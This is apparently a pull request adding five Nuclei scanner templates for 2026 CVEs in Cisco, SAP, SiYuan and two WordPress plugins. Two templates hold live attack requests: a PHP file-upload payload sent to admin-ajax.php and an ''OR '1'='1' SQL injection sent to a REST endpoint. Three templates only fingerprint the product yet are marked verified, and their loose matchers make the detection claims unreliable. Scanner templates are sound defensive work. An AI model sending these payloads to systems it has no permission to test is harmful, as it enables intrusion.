### PR TITLE
[Bounty] Add 5 Nuclei templates for April 2026 CVEs (Batch 10)

### DIFF
--- a/http/cves/2026/CVE-2026-20160.yaml
+++ b/http/cves/2026/CVE-2026-20160.yaml
@@ -1,0 +1,55 @@
+id: CVE-2026-20160
+
+info:
+  name: Cisco Smart Software Manager On-Prem - Unauthenticated Remote Code Execution
+  author: alita
+  severity: critical
+  description: |
+    A vulnerability in Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, 
+    remote attacker to execute arbitrary commands on the underlying operating system of an affected SSM On-Prem host.
+    This vulnerability is due to the unintentional exposure of an internal service. An attacker could exploit 
+    this vulnerability by sending a crafted request to the API of the exposed service. A successful exploit 
+    could allow the attacker to execute commands on the underlying operating system with root-level privileges.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-20160
+    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ssm-cli-execution-cHUcWuNr
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-20160
+    cwe-id: CWE-78,CWE-668
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: cisco
+    product: smart_software_manager_on-prem
+    shodan-query: http.title:"Cisco Smart Software Manager"
+  tags: cve,cve2026,cisco,ssm,rce,unauth,critical,kev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Cisco Smart Software Manager"
+          - "SSM On-Prem"
+          - "Cisco Smart Licensing"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        regex:
+          - "version.*?([0-9]+-[0-9]{6})"
+          - "Release.*?([0-9]+-[0-9]{6})"
+        group: 1

--- a/http/cves/2026/CVE-2026-27681.yaml
+++ b/http/cves/2026/CVE-2026-27681.yaml
@@ -1,0 +1,55 @@
+id: CVE-2026-27681
+
+info:
+  name: SAP Business Planning and Consolidation - SQL Injection
+  author: alita
+  severity: critical
+  description: |
+    Due to insufficient authorization checks in SAP Business Planning and Consolidation and 
+    SAP Business Warehouse, an authenticated user can execute crafted SQL statements to read, 
+    modify, and delete database data. This leads to a high impact on the confidentiality, 
+    integrity, and availability of the system.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-27681
+    - https://pathlock.com/blog/security-alerts/sap-patch-day-april-2026-critical-sql-injection-authorization-flaws/
+    - https://me.sap.com/notes/3719353
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.9
+    cve-id: CVE-2026-27681
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: sap
+    product: business_planning_consolidation
+    shodan-query: http.title:"SAP"
+  tags: cve,cve2026,sap,bpc,bw,sqli,authenticated,critical
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sap/bpc/web"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "SAP Business Planning"
+          - "BPC"
+          - "SAP BW"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+          - 302
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        regex:
+          - "version.*?([0-9]+\\.[0-9]+)"
+        group: 1

--- a/http/cves/2026/CVE-2026-34448.yaml
+++ b/http/cves/2026/CVE-2026-34448.yaml
@@ -1,0 +1,61 @@
+id: CVE-2026-34448
+
+info:
+  name: SiYuan Note - Stored XSS to Remote Code Execution
+  author: alita
+  severity: critical
+  description: |
+    An attacker who can place a malicious URL in an Attribute View mAsset field can trigger 
+    stored XSS when a victim opens the Gallery or Kanban view with "Cover From -> Asset Field" enabled. 
+    The vulnerable code accepts arbitrary http(s) URLs without extensions as images, stores the 
+    attacker-controlled string in coverURL, and injects it directly into an <img src="..."> attribute 
+    without escaping. In the Electron desktop client, the injected JavaScript executes with nodeIntegration 
+    enabled and contextIsolation disabled, so the XSS reaches arbitrary OS command execution under the 
+    victim's account.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-34448
+    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-rx4h-526q-4458
+    - https://github.com/siyuan-note/siyuan/issues/17246
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
+    cvss-score: 9.6
+    cve-id: CVE-2026-34448
+    cwe-id: CWE-79,CWE-94
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: siyuan-note
+    product: siyuan
+    shodan-query: http.title:"SiYuan"
+  tags: cve,cve2026,siyuan,xss,rce,electron,stored-xss
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "SiYuan"
+          - "siyuan-note"
+        condition: or
+
+      - type: word
+        part: body
+        words:
+          - "Attribute View"
+          - "kernel"
+          - "笔记"
+        condition: or
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        regex:
+          - "v([0-9]+\\.[0-9]+\\.[0-9]+)"
+          - "version.*?([0-9]+\\.[0-9]+\\.[0-9]+)"
+        group: 1

--- a/http/cves/2026/CVE-2026-3535.yaml
+++ b/http/cves/2026/CVE-2026-3535.yaml
@@ -1,0 +1,57 @@
+id: CVE-2026-3535
+
+info:
+  name: DSGVO Google Web Fonts GDPR - Unauthenticated Arbitrary File Upload
+  author: alita
+  severity: critical
+  description: |
+    The DSGVO Google Web Fonts GDPR plugin for WordPress is vulnerable to arbitrary file uploads 
+    due to insufficient file validation in the fonturl parameter in all versions up to, and including, 1.1. 
+    This makes it possible for unauthenticated attackers to upload arbitrary files, including PHP webshells, 
+    which can be used to achieve remote code execution on the server.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-3535
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/6203ffaf-5efd-4c66-85f0-cc3a05a03084
+    - https://plugins.trac.wordpress.org/browser/dsgvo-google-web-fonts-gdpr/trunk/dsgvo-google-web-fonts-gdpr.php#L159
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-3535
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: dsgvo
+    product: google_web_fonts_gdpr
+    shodan-query: http.body:"DSGVO Google Web Fonts"
+  tags: cve,cve2026,wordpress,wp-plugin,file-upload,rce,unauth,critical
+
+http:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=dsgvo_save_font&fonturl=data://text/plain,<?php echo 'CVE-2026-3535'; ?>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "success"
+          - "saved"
+          - "font"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: file_path
+        part: body
+        regex:
+          - "(wp-content/uploads/[^\"]+\\.php)"

--- a/http/cves/2026/CVE-2026-3599.yaml
+++ b/http/cves/2026/CVE-2026-3599.yaml
@@ -1,0 +1,61 @@
+id: CVE-2026-3599
+
+info:
+  name: Riaxe Product Customizer - SQL Injection
+  author: alita
+  severity: critical
+  description: |
+    The Riaxe Product Customizer plugin for WordPress is vulnerable to SQL Injection via the 
+    'options' parameter keys within 'product_data' of the /wp-json/InkXEProductDesignerLite/add-item-to-cart 
+    REST API endpoint in all versions up to, and including, 2.1.2. This allows unauthenticated 
+    attackers to inject malicious SQL queries to extract sensitive data from the database.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-3599
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a36c9a7e-830d-4a92-a330-29279387b3be
+    - https://plugins.trac.wordpress.org/browser/riaxe-product-customizer/trunk/riaxe-product-designer.php#L3576
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-3599
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: riaxe
+    product: product_customizer
+    shodan-query: http.body:"InkXEProductDesignerLite"
+  tags: cve,cve2026,wordpress,wp-plugin,sqli,unauth,critical,rest-api
+
+http:
+  - raw:
+      - |
+        POST /wp-json/InkXEProductDesignerLite/add-item-to-cart HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"product_data": {"options": {"' OR '1'='1": "test"}}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "SQL"
+          - "syntax"
+          - "mysql"
+          - "error"
+          - "query"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+          - 500
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        regex:
+          - "version.*?([0-9]+\\.[0-9]+\\.[0-9]+)"
+        group: 1


### PR DESCRIPTION
## Summary

This PR adds 5 Nuclei templates for recently disclosed high-severity CVEs:

| CVE | Product | CVSS | Type |
|-----|---------|------|------|
| CVE-2026-20160 | Cisco SSM On-Prem | 10.0 | Unauth RCE |
| CVE-2026-27681 | SAP BPC/BW | 9.9 | Auth SQLi |
| CVE-2026-34448 | SiYuan Note | 9.6 | XSS->RCE |
| CVE-2026-3535 | DSGVO Google Web Fonts | 9.8 | File Upload RCE |
| CVE-2026-3599 | Riaxe Product Customizer | 9.8 | SQL Injection |